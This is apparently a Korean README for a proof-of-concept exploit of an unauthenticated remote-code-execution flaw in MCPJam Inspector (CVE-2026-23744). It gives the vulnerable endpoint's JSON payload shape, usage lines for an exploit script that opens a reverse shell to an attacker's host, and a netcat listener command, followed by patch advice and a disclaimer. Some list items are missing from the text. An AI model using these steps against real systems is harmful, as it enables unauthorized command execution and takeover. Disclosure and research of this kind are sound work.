
CVE-2026-23744는 MCPJam Inspector ≤ 1.4.2에 영향을 미치는 치명적인 무인증 원격 코드 실행 (RCE) 취약점입니다. 이 문제는 Inspector가 사용자가 제어하는 MCP 서버 구성을 허용하고 적절한 인증 또는 보안 제한 없이 프로세스 실행을 트리거할 수 있는 관리 엔드포인트(/api/mcp/connect)를 노출하기 때문에 발생합니다. 영향을 받는 버전은 기본적으로 localhost 대신 0.0.0.0(모든 인터페이스)에서 수신 대기하므로, 서비스가 네트워크에서 접근 가능한 경우 원격 악용이 가능합니다.
이 취약점은 다음 엔드포인트와 관련이 있습니다:
POST /api/mcp/connect
이 엔드포인트는 서버 구성을 포함한 JSON 객체를 허용합니다. 예를 들면 다음과 같습니다:
{
"serverConfig": {
"command": "<executable>",
"args": ["<arguments>"],
"env": {}
},
"serverId": "<identifier>"
}
이렇게 제공된 구성은 MCPJam Inspector가 새 MCP 서버 프로세스를 생성하고 관리하는 데 사용됩니다. 엔드포인트에 충분한 인증 및 보안 통제가 없기 때문에, 공격자는 Inspector 서비스에 의해 실행되는 임의의 프로세스 정의를 제출할 수 있습니다.
근본적으로 이 취약점은 중요 기능에 대한 인증 누락 (CWE-306) 문제로, 애플리케이션이 신뢰할 수 있는 로컬 사용자를 위해 설계된 기능을 네트워크를 통해 적절한 보안 검사 없이 접근 가능하게 노출합니다.
이 취약점은 두 가지 설계 결함에서 발생합니다:
0.0.0.0에서 수신 대기합니다.결과적인 공격 경로는 다음과 같이 시각화할 수 있습니다:
Attacker → /api/mcp/connect → Process Creation → Operating System
애플리케이션이 운영 체제 프로세스 생성과 직접 인터페이스하므로, 성공적인 악용은 MCPJam Inspector 서비스의 보안 컨텍스트 내에서 임의의 명령 실행으로 이어질 수 있습니다.
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
-t (또는) --target: 대상 URL 또는 대상 IP 주소.-tport (또는) --target-port: 연결할 대상 포트. 대부분의 경우 MCPJam Inspector의 경우 6274입니다. MCPJam Inspector가 서브도메인이나 가상 호스트와 같은 다른 곳에 호스팅된 경우 이 인수를 사용하지 마십시오. 대신 -t 인수를 사용하여 서브도메인 또는 가상 호스트를 지정하십시오.-lhost (또는) --local-host: 리버스 셸이 연결될 공인 IP 주소.-lport (또는) --local-port: 리버스 셸에 사용할 포트.python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
-c (또는) --command: 대상에서 실행할 명령.이 프로그램을 사용하기 전에 먼저 Netcat을 사용하여 로컬 머신에서 리스너를 시작해야 합니다.
이렇게 하려면 다음 명령을 사용하십시오:
nc -lvnp <port>
그런 다음 위 명령을 실행하여 대상에서 리버스 셸을 얻으십시오.
성공적인 악용을 통해 공격자는 다음을 수행할 수 있습니다:
이 취약점은 네트워크 기반 공격 벡터, 인증 부재, 사용자 상호작용 부재, 기밀성·무결성·가용성에 대한 높은 영향으로 인해 CVSS v3.1 점수 9.8 (치명적) 로 지정되었습니다.
즉시 MCPJam Inspector 1.4.3 이상으로 업그레이드하십시오. 추가 방어 조치는 다음과 같습니다:
이 PoC는 교육, 방어적 보안 연구, 그리고 승인된 보안 테스트를 위한 것입니다. 명시적 허가를 받은 시스템에 대해서만 사용해야 합니다. 제3자 시스템에 대한 무단 사용은 해당 법률 및 규정을 위반할 수 있습니다. 이 저장소의 소유자는 이 프로그램 사용으로 인해 발생하는 어떠한 손해에 대해서도 책임을 지지 않습니다.